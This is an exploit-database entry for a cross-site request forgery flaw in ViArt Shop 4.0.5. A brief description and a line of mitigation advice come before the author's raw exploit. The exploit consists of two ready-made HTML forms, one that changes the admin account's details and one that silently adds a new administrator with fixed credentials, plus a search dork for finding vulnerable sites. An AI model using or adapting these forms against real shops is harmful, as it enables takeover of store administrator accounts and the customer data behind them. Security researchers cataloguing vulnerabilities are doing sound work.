header-logo
Suggest Exploit
vendor:
ViArt Shop
by:
Or4nG.M4N
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: ViArt Shop
Affected Version From: 4.0.5
Affected Version To: 4.0.5
Patch Exists: N/A
Related CWE: N/A
CPE: a:viart:viart_shop:4.0.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
n/a

ViArt CSRF

ViArt Shop 4.0.5 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can exploit this vulnerability to change the admin password and add a new admin account without the knowledge of the admin. This vulnerability can be exploited by sending a malicious link to the admin or by embedding the malicious code in an iframe on a website that the admin visits.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.
Source

Exploit-DB raw data:

+-------------------------------------------------------------------------+
# Software      : viart shop 4.0.5                                                                                                                             
# Author        : Or4nG.M4N                                               
# Date          : n/a    
# Dork          : inurl:"powered by viart shop 4.0.5"   
# Software Link : http://www.viart.com/                                                                                     
+-------------------------------------------------------------------------+
  +---+[CSRF Change Admin Password by OR4NG.M4N]+---+
<HTML>
<HEAD>
<TITLE>[#] Exploit [#]</TITLE>
<BODY dir=rtl background="" aLink=#ff0000 link=#0000ff bgColor=#ffffff text=#000000 vLink=#800080>
<P align=center>
<STRONG><FONT size=5 face=Verdana><FONT color=#00c000>ViArt</FONT> CSRF </FONT></STRONG></P>
</BODY>
</HTML>
<form action="http://localhost/vert/admin/admin_admin.php" name="record" method="POST">
<input name="operation" value="save" type="hidden">
<input name="admin_id" value="1" type="hidden">
<input name="is_hidden" id="is_hidden" value="1" type="hidden">
<input class="field" size="60" name="admin_name" value="root" type="hidden">
<input class="field" size="60" name="nickname" value="root" type="hidden">
<input class="field" size="60" maxlength="255" name="personal_image" value="FucK" type="hidden"> 
<input class="field" size="60" maxlength="8" name="admin_alias" value="Fuc1K" type="hidden">
<P align=center><select name="privilege_id"  >
<option selected="selected" value="1">
<input class="field" size="60" name="email" value="priv8te@hotmail.com" type="hidden">
<input cols="60" rows="5" value="Or4nG.M4N" name="signature" type="hidden" >
<span class="button"><input class="submit" value="Update" onclick="document.record.operation.value='save'" type="submit"></span>
  +---+[CSRF Add Admin Acuonnt by OR4NG.M4N]+---+
<HTML>
<HEAD>
<TITLE>[#] Exploit [#]</TITLE>
<BODY dir=rtl background="" aLink=#ff0000 link=#0000ff bgColor=#ffffff text=#000000 vLink=#800080>
<P align=center>
<STRONG><FONT size=5 face=Verdana><FONT color=#00c000>ViArt</FONT> CSRF </FONT></STRONG></P>
</BODY>
</HTML>
<form action="http://localhost/vert/admin/admin_admin.php" name="record" method="POST">
<input name="operation" value="save" type="hidden">
<input name="admin_id" value="2" type="hidden">
<table border="0" cellpadding="4" cellspacing="1" width="100%">
<input class="field" size="30" name="login" value="root1" type="hidden">
<input class="field" size="30" name="password" value="root1" type="hidden">
<input class="field" size="30" name="confirm" value="root1" type="hidden"> 
<input name="is_hidden" id="is_hidden" value="1" type="hidden">
<input class="field" size="60" name="admin_name" value="root1" type="hidden">
<input class="field" size="60" name="nickname" value="root1" type="hidden">
<input class="field" size="60" maxlength="8" name="admin_alias" value="Or4nG.M4n" type="hidden">
<P align=center><select name="privilege_id"  >
<option selected="selected" value="1">
<input class="field" size="60" name="email" value="priv8te@hotmail.com" type="hidden">
<input cols="60" rows="5" name="signature" value="Or4nG.M4N" type="hidden" >
<span class="button"><input class="submit" value="Add New" onclick="document.record.operation.value='save'" type="submit"></span>

#-----------------------------------#
|  by Or4nG.M4n | Th3 r34L H4ck3r   |
|        priv8te@hotmail.com        |
|    THNKS 2 : SarBoT511 . i-HmX    |
|     SadHaCk3r . The Injector      |
|     Lagripe-Dz . FoX Hacker       |
#-----------------------------------#
 www.Sec4Ever.Com | www.v4-team.com